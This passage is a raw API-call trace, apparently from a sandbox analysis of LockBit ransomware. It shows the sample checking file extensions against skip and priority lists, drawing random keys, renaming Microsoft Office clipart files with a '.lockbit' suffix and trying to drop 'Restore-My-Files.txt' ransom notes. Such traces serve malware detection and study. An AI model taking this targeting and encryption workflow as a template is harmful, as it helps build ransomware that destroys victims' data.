(lpString1=".dacpac", lpString2=".GIF") returned -1 [0169.752] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0169.752] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0169.753] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0169.753] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0169.753] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF.lockbit") returned 72 [0169.754] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0169.755] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.755] malloc (_Size=0x40068) returned 0x3d70450 [0169.755] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=20645) returned 1 [0169.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0169.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0169.756] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0169.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.809] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.809] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.810] free (_Block=0x1fa2ed8) [0169.810] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.811] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.811] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.811] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d585700, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d585700, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02742U.BMP", cAlternateFileName="")) returned 1 [0169.811] lstrcmpiW (lpString1=".", lpString2="PH02742U.BMP") returned -1 [0169.811] lstrcmpiW (lpString1="..", lpString2="PH02742U.BMP") returned -1 [0169.811] PathFindExtensionW (pszPath="PH02742U.BMP") returned=".BMP" [0169.811] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.811] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.811] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.811] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.811] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.812] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.812] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.812] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02742U.BMP") returned 1 [0169.813] lstrcmpiW (lpString1="ntldr", lpString2="PH02742U.BMP") returned -1 [0169.813] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02742U.BMP") returned -1 [0169.813] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02742U.BMP") returned -1 [0169.813] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02742U.BMP") returned -1 [0169.813] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02742U.BMP") returned 1 [0169.813] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02742U.BMP") returned -1 [0169.813] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.813] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP") returned=".BMP" [0169.813] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.813] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.813] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.814] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.814] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP.lockbit") returned 72 [0169.814] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.816] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.816] malloc (_Size=0x40068) returned 0x3df0008 [0169.816] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31968) returned 1 [0169.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.817] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.855] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.855] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.855] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.883] free (_Block=0x1fa2ed8) [0169.883] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.883] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.883] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.884] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1a6dc00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf1a6dc00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x6d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02743G.GIF", cAlternateFileName="")) returned 1 [0169.884] lstrcmpiW (lpString1=".", lpString2="PH02743G.GIF") returned -1 [0169.884] lstrcmpiW (lpString1="..", lpString2="PH02743G.GIF") returned -1 [0169.884] PathFindExtensionW (pszPath="PH02743G.GIF") returned=".GIF" [0169.884] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0169.884] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0169.884] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0169.885] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0169.885] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0169.885] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0169.885] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0169.885] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0169.885] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0169.886] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02743G.GIF") returned 1 [0169.886] lstrcmpiW (lpString1="ntldr", lpString2="PH02743G.GIF") returned -1 [0169.886] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02743G.GIF") returned -1 [0169.886] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02743G.GIF") returned -1 [0169.886] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02743G.GIF") returned -1 [0169.886] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02743G.GIF") returned 1 [0169.886] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02743G.GIF") returned -1 [0169.886] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.886] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF") returned=".GIF" [0169.886] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0169.886] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0169.886] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0169.887] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0169.887] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0169.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0169.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0169.888] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0169.888] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF.lockbit") returned 72 [0169.888] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02743g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0169.889] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.889] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.889] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=28038) returned 1 [0169.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.891] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.893] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.893] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.895] free (_Block=0x1fa2ed8) [0169.895] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.895] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.895] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe489ed00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe489ed00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x5e7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02746G.GIF", cAlternateFileName="")) returned 1 [0169.895] lstrcmpiW (lpString1=".", lpString2="PH02746G.GIF") returned -1 [0169.895] lstrcmpiW (lpString1="..", lpString2="PH02746G.GIF") returned -1 [0169.895] PathFindExtensionW (pszPath="PH02746G.GIF") returned=".GIF" [0169.895] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0169.895] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0169.896] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0169.896] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 